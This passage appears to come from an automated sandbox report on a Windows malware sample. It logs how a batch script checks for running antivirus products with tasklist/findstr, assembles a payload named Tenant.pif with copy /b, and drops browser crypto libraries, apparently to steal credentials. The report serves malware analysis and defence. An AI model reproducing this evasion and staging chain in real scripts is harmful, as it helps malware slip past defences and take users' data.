                    Source: Tenant.pif, 0000000B.00000002.4078109784.000000000C927000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4077923010.000000000C4E8000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                    Source: Tenant.pif, 0000000B.00000002.4088074637.00000000252FB000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
                    Source: Tenant.pif, 0000000B.00000002.4078109784.000000000C927000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4077923010.000000000C4E8000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                    Source: Tenant.pif, 0000000B.00000002.4088074637.00000000252FB000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.drBinary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                    Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Cashiers Cashiers.bat & Cashiers.bat & exit
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 271973
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "NorwegianLivedJerseyRelaxation" Para
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Ventures + ..\Thousands + ..\Enhance + ..\Kept + ..\Everything + ..\Say C
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif Tenant.pif C
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2260 -s 3264
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Cashiers Cashiers.bat & Cashiers.bat & exitJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc" Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth" Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 271973Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "NorwegianLivedJerseyRelaxation" Para Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Ventures + ..\Thousands + ..\Enhance + ..\Kept + ..\Everything + ..\Say CJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif Tenant.pif CJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: shfolder.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifSection loaded: wsock32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifSection loaded: napinsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifSection loaded: pnrpnsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifSection loaded: wshbth.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifSection loaded: winrnr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifSection loaded: rstrtmgr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifSection loaded: dbghelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifSection loaded: mozglue.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifSection loaded: vcruntime140.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifSection loaded: msvcp140.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifSection loaded: windows.fileexplorer.common.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifSection loaded: ntshrui.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifSection loaded: cscapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifSection loaded: linkinfo.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: freebl3.pdb source: Tenant.pif, 0000000B.00000002.4080885792.00000000134A2000.00000004.00000800.00020000.00000000.sdmp, freebl3.dll.11.dr
                    Source: Binary string: mozglue.pdbP source: Tenant.pif, 0000000B.00000002.4097408823.000000006C69D000.00000002.00000001.01000000.00000009.sdmp, Tenant.pif, 0000000B.00000002.4083100268.000000001941E000.00000004.00000800.00020000.00000000.sdmp, mozglue.dll.11.dr
                    Source: Binary string: freebl3.pdbp source: Tenant.pif, 0000000B.00000002.4080885792.00000000134A2000.00000004.00000800.00020000.00000000.sdmp, freebl3.dll.11.dr
                    Source: Binary string: nss3.pdb@ source: Tenant.pif, 0000000B.00000002.4097716710.000000006C85F000.00000002.00000001.01000000.00000008.sdmp, Tenant.pif, 0000000B.00000002.4092825323.00000000311DE000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.11.dr
                    Source: Binary string: softokn3.pdb@ source: Tenant.pif, 0000000B.00000002.4088074637.00000000252FB000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr
                    Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: Tenant.pif, 0000000B.00000002.4090409721.000000002B265000.00000004.00000800.00020000.00000000.sdmp, vcruntime140.dll.11.dr
                    Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: Tenant.pif, 0000000B.00000002.4085470552.000000001F389000.00000004.00000800.00020000.00000000.sdmp, msvcp140.dll.11.dr
                    Source: Binary string: nss3.pdb source: Tenant.pif, 0000000B.00000002.4097716710.000000006C85F000.00000002.00000001.01000000.00000008.sdmp, Tenant.pif, 0000000B.00000002.4092825323.00000000311DE000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.11.dr
                    Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: Tenant.pif, 0000000B.00000002.4078109784.000000000C927000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4077923010.000000000C4E8000.00000002.00001000.00020000.00000000.sdmp
                    Source: Binary string: mozglue.pdb source: Tenant.pif, 0000000B.00000002.4097408823.000000006C69D000.00000002.00000001.01000000.00000009.sdmp, Tenant.pif, 0000000B.00000002.4083100268.000000001941E000.00000004.00000800.00020000.00000000.sdmp, mozglue.dll.11.dr
                    Source: Binary string: softokn3.pdb source: Tenant.pif, 0000000B.00000002.4088074637.00000000252FB000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
                    Source: nss3.dll.11.drStatic PE information: section name: .00cfg
                    Source: freebl3.dll.11.drStatic PE information: section name: .00cfg
                    Source: mozglue.dll.11.drStatic PE information: section name: .00cfg
                    Source: msvcp140.dll.11.drStatic PE information: section name: .didat
                    Source: softokn3.dll.11.drStatic PE information: section name: .00cfg
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00AC8B75 push ecx; ret 11_2_00AC8B88

                    Persistence and Installation Behavior

                    barindex
                    Drops PE files with a suspicious file extension
                    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifJump to dropped file
                    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifFile created: C:\ProgramData\nss3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifFile created: C:\ProgramData\mozglue.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifFile created: C:\ProgramData\freebl3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifFile created: C:\ProgramData\softokn3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifFile created: C:\ProgramData\nss3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifFile created: C:\ProgramData\mozglue.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifFile created: C:\ProgramData\freebl3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifFile created: C:\ProgramData\softokn3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00B259B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,11_2_00B259B3
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00AB5EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,11_2_00AB5EDA
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00AC33B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,11_2_00AC33B7
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
